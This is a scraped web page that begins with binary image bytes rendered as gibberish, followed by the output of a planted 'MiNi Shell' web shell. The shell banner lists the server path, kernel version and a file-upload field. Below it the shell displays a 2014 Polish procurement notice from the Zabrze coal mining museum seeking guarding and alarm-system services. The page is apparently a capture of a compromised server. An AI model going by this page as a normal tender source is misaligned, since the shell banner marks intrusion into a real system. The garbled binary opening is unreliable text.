JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141201/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20141201/393650-N-2014.html

<p class="kh_header"><b>Zabrze: <BR> Ochrona osób i mienia - poprzez  bezpośrednią ochronę fizyczną oraz zabezpieczenia techniczne - na obszarach użytkowanych przez Muzeum Górnictwa Węglowego <BR>w Zabrzu.<BR>
Numer postępowania ZP/63/MGW/2014</b><br>
<b>Numer ogłoszenia: 393650 - 2014; data zamieszczenia: 01.12.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Muzeum Górnictwa Węglowego w Zabrzu , ul. Jodłowa 59, 41-800 Zabrze, woj. śląskie, tel. 32 630 30 91, faks 32 277 11 25.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.muzeumgornictwa.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.muzeumgornictwa.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> <BR> Ochrona osób i mienia - poprzez  bezpośrednią ochronę fizyczną oraz zabezpieczenia techniczne - na obszarach użytkowanych przez Muzeum Górnictwa Węglowego <BR>w Zabrzu.<BR>
Numer postępowania ZP/63/MGW/2014.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> <BR>Przedmiotem zamówienia jest:<BR>
 1. na obszarach użytkowanych przez Zamawiającego - ochrona osób i ochrona mienia użytkowanego  przez:<BR>
- Muzeum Górnictwa Węglowego w Zabrzu,<BR>
- przedsiębiorców wykonujących roboty na zlecenie Zamawiającego,<BR>
- dzierżawców i najemców części lub całości obiektów lub terenów użytkowanych przez Zamawiającego,<BR>
- podmioty zewnętrzne - współorganizatorów lub współprowadzących ekspozycje,<BR>
- tych, których użytkowane przez nich mienie zostało użyte do organizacji ekspozycji;<BR>
2.  realizowana w formie bezpośredniej ochrony fizycznej stałej i doraźnej:<BR>
świadczonej posterunkami stałymi, doraźnymi i grupą interwencyjną oraz wykonywanej dozorem sygnałów z własnych i Zamawiającego, elektronicznych urządzeń i systemów alarmowych (dozorowanie tych sygnałów przez pracowników ochrony, obsadzających posterunki) <BR>

3. 	realizowana w formie zabezpieczenia technicznego:<BR>
- poprzez montaż, na czas realizacji zamówienia, własnych systemów telewizji przemysłowej CCTV 
i montaż elementów systemów telewizji przemysłowej CCTV,<BR>
     - poprzez eksploatowanie, konserwowanie i naprawianie własnych systemów telewizji przemysłowej CCTV i ich elementów oraz poprzez eksploatowanie, konserwowanie i naprawianie (usterek nie objętych gwarancją) elektronicznych urządzeń i systemów alarmowych będących własnością Zamawiającego<BR>
4. oraz wykonywanie innych czynności, tj:<BR>
- sporządzenie instrukcji ochrony obszarów nie podlegających obligatoryjnej ochronie i, w razie potrzeby, ich aktualizowanie, w razie potrzeby aktualizowanie Planu ochrony Muzeum Górnictwa Węglowego w Zabrzu, uzgadnianie aktualizacji ze Śląskim Wojewódzkim Komendantem Policji w Katowicach,<BR>
- wydawanie i przyjmowanie kluczy do obiektów i pomieszczeń osobom upoważnionym do ich pobrania,<BR>
- kontrola ruchu osobowo - materiałowego na poszczególnych obszarach i w obiektach według zakresu i zasad określonych przez Zamawiającego,<BR>
- w przypadku  wezwania przez Zamawiającego, na wskazanym obszarze, kontrola wjazdów 
i wyjazdów pojazdów; prowadzenie rejestru tych czynności, <BR>
- zamykanie i otwieranie drzwi na dziedziniec w budynku przy ul. 3 Maja 19 w Zabrzu, <BR>
- w razie potrzeby (w szczególności podczas imprez, wzmożonego ruchu turystycznego)  organizowanie parkowania pojazdów, <BR>
- na obszarze Kopalnia Guido - w dniach kiedy Kopalnia jest nieczynna - kontrola poziomu wody w rząpiach Szybów Kolejowy i Guido, a po kontroli postępowanie zgodnie z otrzymaną instrukcją, <BR>
- oczyszczanie wskazanych parkingów, chodników i alejek znajdujących się na obszarach 
a także chodników przylegających do obszarów z liści, śniegu, lodu i innych zanieczyszczeń,<BR>
- na czas realizacji zamówienia wyposażenie obszarów podlegających obligatoryjnej ochronie 
w sejfy na broń a po zamontowaniu ich niezwłoczne zgłoszenie tego faktu Policji, <BR>
- na wezwanie Zamawiającego kontrola trzeźwości pracowników Zamawiającego,<BR>
- na czas realizacji zamówienia montaż własnego systemu kontroli obchodów pracowników ochrony ze zobrazowaniem na mapach w komputerze wskazanym przez Zamawiającego; dostarczanie w formie wydruku - na żądanie Zamawiającego - rejestrów wykonanych obchodów, <BR>
- prowadzenie, przez obsadę posterunku stałego Hostelu Guido, książki meldunkowej Hostelu,<BR>
- przyjmowanie,  przez obsadę posterunku stałego Hostelu Guido, zgłoszeń od gości Hostelu o usterkach i nieprawidłowościach,<BR>
- podejmowanie interwencji wobec przebywających w Hostelu Guido i nieprzestrzegających Regulaminu Hostelu w szczególności w przypadkach:<BR>
- nieprzestrzegania ciszy nocnej <BR>
- zakłócania porządku publicznego <BR>
- nieprzestrzegania zakazu palenia wyrobów tytoniowych<BR>
  oraz w przypadkach niszczenia  lub uszkadzania mienia.<BR>
W przypadku podejmowania takich interwencji, w terminach ustalonych, informowanie o nich osobę wskazaną przez Zamawiającego.  <BR> <BR>
  
Wszystkie czynności objęte zamówieniem - za wyjątkiem oczyszczania wskazanych parkingów, chodników i alejek znajdujących się na obszarach a także chodników przylegających do obszarów 
z liści, śniegu, lodu i innych zanieczyszczeń - muszą wykonywać kwalifikowani pracownikami ochrony fizycznej i kwalifikowani pracownicy zabezpieczenia technicznego, którzy - we wszystkich dokumentach dotyczących niniejszego zamówienia - zwani są dalej pracownikami ochrony i pracownikami zabezpieczenia (w rozumieniu Ustawy o ochronie osób i mienia - Dz. U. z 2005 r. Nr 145, poz. 1221 
z późn. zm.) Prace dotyczące zabezpieczeń technicznych mogą wykonywać tylko pracownicy zabezpieczenia.<BR>

Część obszarów Zamawiającego ( znajdujące się na nich obiekty i urządzenia) zostało, Decyzją 
Nr ZKIII.68.3.10.2013 z 13 czerwca 2013 roku Wojewody Śląskiego, umieszczonych w ewidencji obiektów 
i urządzeń podlegających obowiązkowej ochronie. Dla obszarów tych Zamawiający posiada Plan ochrony obiektów opatrzony klauzulą (do użytku służbowego) Plan i Decyzja do wglądu w siedzibie Zamawiającego. Obszary objęte obligatoryjną ochroną znajdują się w Zabrzu przy ulicach: 3 Maja 19, 
3 Maja 93, Wolności 408 - 410 i Sienkiewicza 43.<BR>
Wykonawca zrealizuje przedmiot zamówienia w nieprzekraczalnym terminie: nie wcześniej niż od godziny 14:00 dnia 02.01.2015r. do godziny 14:00 dnia 04.01.2016r..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielanie uzupełniających, o których mowa w art. 67 ust.1 pkt 6 Pzp do 10% wartości zamówienia podstawowego.<BR>
79710000-4 usługi ochroniarskie,<BR>
92521200-1 usługi ochrony wystaw i eksponatów,<BR>
92522000-6 usługi ochrony obiektów i budynków historycznych,<BR>
92522100-7 usługi ochrony obiektów historycznych,<BR>
92522200-8 usługi ochrony budynków historycznych<BR>
Okoliczności, po których zaistnieniu mogą być udzielane zamówienia uzupełniające:<BR>
- zwiększenie zagrożenia bezpieczeństwa (faktyczne bądź potencjalne), <BR> 
- konieczność przemieszczenia, modyfikacji lub dodatkowego zamontowania elektronicznych urządzeń i systemów alarmowych, <BR>
- konieczność organizacji dodatkowych imprez (ponad ilość godzin określoną w SIWZ), <BR>
- zmiana funkcji obiektów, <BR>
- prowadzenie inwestycji, <BR>
- zmiana terminów rozpoczęcia lub zakończenia inwestycji, <BR>
- pozyskanie do posiadania obiektów lub obszarów, <BR>
- umieszczenia na wykazie wojewody obszarów podlegających obligatoryjnej ochronie obszaru Zamawiającego, który nie był na tym wykazie w czasie ogłaszania zamówienia <BR></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 79.71.00.00-4, 92.52.12.00-1, 92.52.20.00-6, 92.52.21.00-7, 92.52.22.00-8, 92.52.22.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 02.01.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> <BR>1. Zamawiający żąda od Wykonawców wniesienia wadium w wysokości: 15.000,00 PLN, 
(słownie: piętnaście tysięcy zł 00/100).
zabezpieczającego ofertę na okres 30 dni. <BR>
2. Wadium wnosi się  przed upływem terminu składania ofert. <BR>
3. Wadium może być wniesione w jednej lub  kilku następujących formach: <BR>
1)	pieniądzu;<BR>
2)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy  oszczędnościowo-kredytowej,  z  tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym <BR>
3)	gwarancjach bankowych<BR>
4)	gwarancjach ubezpieczeniowych<BR>
5)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt  2 ustawy 
z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. 
z 2007 r. Nr 42, poz. 275 z późn. zm.).<BR>
4. Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy Zamawiającego: Alior Bank Nr konta 10 2490 0005 0000 4520 1321 0075 <BR>
Wadium wniesione w pieniądzu zamawiający przechowuje na rachunku bankowym</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p><BR>Warunek zostanie spełniony jeżeli wykonawca wykaże, że posiada:<BR>
a)	koncesję wydaną przez ministra właściwego ds. wewnętrznych w zakresie usług ochrony osób i mienia,<BR>
b)	koncesję na zabezpieczenia techniczne - eksploatacje, montaż, konserwacje i naprawy w miejscach  zainstalowania elektronicznych urządzeń i systemów alarmowych, sygnalizujących zagrożenie chronionych osób i mienia,<BR>
c)	pozwolenie na broń na okaziciela, wydawane przedsiębiorcom, którzy uzyskali koncesje na prowadzenie działalności gospodarczej w zakresie usług ochrony osób i mienia,<BR>
d)	status specjalistycznej uzbrojonej formacji ochronnej (SUFO).<BR>
Wykonawca złoży dokumenty:<BR>
A)	potwierdzające posiadanie uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania tj.:<BR> 
- koncesje wydane przez ministra właściwego ds. wewnętrznych:<BR>
- na ochronę fizyczną, <BR>
- na zabezpieczenia techniczne  - eksploatacje, montaż, konserwacje i naprawy, w miejscach  zainstalowania, elektronicznych urządzeń i systemów alarmowych, sygnalizujących zagrożenie chronionych osób i mienia, <BR>
- pozwolenie na broń na okaziciela, wydawane przedsiębiorcom, którzy uzyskali koncesje na prowadzenie działalności gospodarczej w zakresie usług ochrony osób i mienia, <BR>
- oświadczenie Wykonawcy, iż spełnia warunki wymagane dla posiadania statusu specjalistycznej uzbrojonej formacji ochronnej (SUFO).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p><BR>Warunek zostanie spełniony, jeżeli Wykonawca wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał, a w przypadku świadczeń okresowych lub ciągłych również wykonuje należycie usługi 
w zakresie niezbędnym do spełniania warunku wiedzy i doświadczenia tj.:<BR> 
a) nie więcej niż trzy usługi, o sumie wartości nie mniejszej niż 400 000,00 zł brutto, w okresie 
12 następujących kolejno po sobie miesięcy, polegające na bezpośredniej ochronie fizycznej stałej i doraźnej obiektu użyteczności publicznej lub kompleksu obiektów użyteczności publicznej znajdujących się na wydzielonym obszarze i funkcjonalnie ze sobą powiązanych. 
W przypadku zamówień wykonywanych wartość zrealizowanej części zamówienia, przed upływem terminu składania ofert, nie może być mniejsza niż 400.000,00 zł brutto w okresie 
12 następujących kolejno po sobie miesięcy.<BR>
b) 	nie więcej niż dwie usługi, o sumie wartości nie mniejszej niż 50.000,00 zł brutto, wykonanych 
w okresie 12 następujących kolejno po sobie miesięcy, polegające na zabezpieczeniu technicznym obiektu użyteczności publicznej lub kompleksu obiektów użyteczności publicznej znajdujących się na wydzielonym obszarze i funkcjonalnie ze sobą powiązanych. <BR>
W przypadku zamówień wykonywanych wartość zrealizowanej części zamówienia, przed upływem terminu składania ofert, nie może być mniejsza niż 50.000,00 zł brutto w okresie 
12 następujących kolejno po sobie miesięcy. <BR>
Uwaga ! <BR>
1.	Przez obiekt użyteczności publicznej należy rozumieć obiekt przeznaczony dla administracji publicznej, wymiaru sprawiedliwości, kultury, kultu religijnego, oświaty, szkolnictwa wyższego, nauki, opieki zdrowotnej, opieki społecznej i socjalnej, obsługi bankowej, handlu, gastronomii, usług, turystyki, sportu, obsługi pasażerów w transporcie kolejowym, drogowym, lotniczym lub wodnym, poczty lub telekomunikacji oraz inny ogólnodostępny obiekt przeznaczony do wykonywania podobnych funkcji; za obiekt użyteczności publicznej uznaje się  także budynek biurowy i socjalny. <BR>
2.	Jeżeli zakres wykazanych i udokumentowanych usług jest szerszy niż wymagany przez Zamawiającego, Wykonawca winien w wykazie usług, wskazać wartość, przedmiot, daty wykonania i podmioty, odpowiadające zakresowi przedmiotu zamówienia. <BR>
3.	Jeżeli Wykonawca jest w trakcie wykonywania usługi okresowej lub ciągłej podane kwoty winny dotyczyć wyłącznie usługi zrealizowanej. <BR>

Wykonawca składa dokumenty: <BR> - wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane, wraz z załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie. <BR> 

Na potwierdzenie spełnienia warunku wiedzy i doświadczenia Wykonawca jest zobowiązany wykazać się w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonaniem: <BR>
- nie więcej niż trzech (3) usług, a w przypadku świadczeń okresowych lub ciągłych również wykonywaniem, o łącznej wartości  nie mniejszej niż 400.000,00 PLN brutto wykonanych lub wykonywanych w okresie 12 następujących kolejno po sobie miesięcy, polegających na bezpośredniej ochronie fizycznej stałej i doraźnej obiektu użyteczności publicznej lub kompleksu obiektów użyteczności publicznej znajdujących się na wydzielonym obszarze i funkcjonalnie ze sobą powiązanych, <BR> 
- nie więcej niż dwóch usług, o sumie wartości nie mniejszej niż 50.000,00 zł brutto, wykonanych 
w okresie 12 następujących kolejno po sobie miesięcy, polegających na zabezpieczeniu technicznym obiektu użyteczności publicznej lub kompleksu obiektów użyteczności publicznej znajdujących się na wydzielonym obszarze i funkcjonalnie ze sobą powiązanych. <BR> 
W przypadku zamówień wykonywanych wartość zrealizowanej części zamówienia, przed upływem terminu składania ofert, nie może być mniejsza niż 50.000,00 zł brutto w okresie 
12 następujących kolejno po sobie miesięcy.
z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane oraz załączyć dowody, czy usługi te zostały wykonane lub są wykonywane należycie.<BR>

Uwaga: <BR>
Dowodami określającymi, czy usługi te zostały wykonane lub są wykonywane w sposób 
     należyty są: <BR>
a)	poświadczenie, z tym że w odniesieniu do nadal wykonywanych usług okresowych lub ciągłych poświadczenie powinno być wydane nie wcześniej niż na 3 miesiące przed upływem terminu składania ofert,
b)	oświadczenie wykonawcy - jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać poświadczenia, o którym mowa w pkt 1.<BR>
1.	W przypadku gdy Zamawiający jest podmiotem, na rzecz którego usługi wskazane 
w wykazie zostały wcześniej wykonane, Wykonawca nie ma obowiązku przedkładania dowodów, o których mowa wyżej.<BR>
2.	Równowartość w złotych zadań rozliczanych w walutach obcych zostanie określona według średniego kursu złotego w stosunku do walut obcych ogłoszonego przez NBP obowiązującego  w dniu, w którym  ogłoszenie o niniejszym postępowaniu zostało zamieszczone w Biuletynie Zamówień Publicznych. <BR>
3.	W przypadku, gdy Wykonawca polega na zasobach innych podmiotów przy wykazaniu spełniania warunku doświadczenia, zobowiązany jest wykazać udział tych podmiotów 
w wykonaniu zamówienia. <BR>
4.	W wykazie nie należy podawać informacji o usługach niewykonanych lub wykonanych nienależycie. <BR>
5.	Jeżeli Wykonawca jest w trakcie wykonywania usługi podane wartości winny dotyczyć wyłącznie usługi zrealizowanej.<BR>
6.	Jeżeli zakres usług przedstawionych w dokumencie złożonym na potwierdzenie, wykonania/wykonywania usług w zakresie niezbędnym do wykazania spełnienia warunku wiedzy i doświadczenia jest szerszy od powyżej określonego przez Zamawiającego należy w wykazie podać wartość usług odpowiadających zakresowi przedmiotu zamówienia, przedstawianych 
na potwierdzenie warunku udziału w postępowaniu w zakresie doświadczenia. <BR>
7.	Równowartość w złotych zadań rozliczanych w walutach obcych zostanie określona według średniego kursu złotego w stosunku do walut obcych ogłoszonego przez NBP obowiązującego 
w dniu, w którym opublikowane zostało ogłoszenie o niniejszym zamówieniu w Biuletynie Zamówień Publicznych.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p><BR>Zamawiający uzna powyższy warunek za spełniony jeżeli wykonawca wykaże, że dysponuje potencjałem technicznym niezbędnym do realizacji zamówienia tj.: <BR>
co najmniej 2 oznakowanymi pojazdami do używania przez grupy interwencyjne.<BR>
Wykonawca składa dokumenty: <BR> - wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług. <BR>
w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami, obejmujący nie mniej niż 2 oznakowane pojazdy do używania przez grupy interwencyjne</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p><BR> Zamawiający uzna powyższy warunek za spełniony jeżeli wykonawca wykaże, że dysponuje osobami zdolnymi do wykonania zamówienia (które będą uczestniczyć w wykonywaniu zamówienia) tj.: <BR>
a) kwalifikowanymi pracownikami ochrony fizycznej - nie mniej niż 30 osób <BR>
b) kwalifikowanymi pracownikami zabezpieczenia technicznego - nie mniej niż  5 osób.<BR>
Wykonawca składa dokumenty:<BR> - wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, 
w szczególności odpowiedzialnych za świadczenie usług wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami.<BR>
Zamawiający wymaga, aby osoby, które będą uczestniczyć w wykonywaniu zamówienia posiadały następujące kwalifikacje zawodowe, doświadczenie i wykształcenie z uwzględnieniem zakresu wykonywanych przez nie czynności:<BR>
1)	kwalifikowani pracownicy ochrony fizycznej -  nie mniej niż 30 osób,<BR>
2)	kwalifikowani pracownicy zabezpieczenia technicznego  - nie mniej niż 5 osób</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p><BR>Warunek finansowy <BR>
Zamawiający nie precyzuje warunku w powyższym zakresie.
Zamawiający żąda złożenia oświadczenia z art. 22 ust. 1 Pzp i jego weryfikacja zostanie przeprowadzona wg formuły: (spełnia)-(nie spełnia).<BR>
Warunek ekonomiczny <BR>
Zamawiający uzna powyższy warunek za spełniony jeżeli wykonawca wykaże, że posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę nie mniejszą niż 5.000.000,00 PLN słownie: pięć milionów zł.<BR>
Wykonawca przedstawi dokumenty:<BR>

A)	opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca  jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej 
z przedmiotem zamówienia na sumę ubezpieczenia nie mniejszą niż 5.000.000,00 PLN 
słownie: pięć milionów złotych  <BR>
B)	gdy Wykonawca polega na zdolnościach ekonomicznych innych podmiotów wymaga się przedłożenia opłaconej polisy, a w przypadku jej braku innego dokumentu potwierdzającego, że podmiot trzeci jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej 
z przedmiotem zamówienia <BR>
C)	Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych 
do wykonania zamówienia lub zdolnościach finansowych lub ekonomicznych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował tymi zasobami w trakcie realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia<BR> 

Podmiot, który zobowiązał się do udostępnienia zasobów zgodnie z pkt B, C odpowiada solidarnie 
z wykonawcą za szkodę zamawiającego powstałą wskutek nieudostępnienia tych zasobów, chyba że za nieudostępnienie zasobów nie ponosi winy. <BR>
Równowartość w złotych dla dokumentów ekonomiczno-finansowych wskazanych w walutach obcych zostanie określona według średniego kursu złotego w stosunku do walut obcych ogłoszonego przez NBP obowiązującego  w dniu, w którym  ogłoszenie o niniejszym postępowaniu zostało zamieszczone 
w Biuletynie Zamówień Publicznych.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

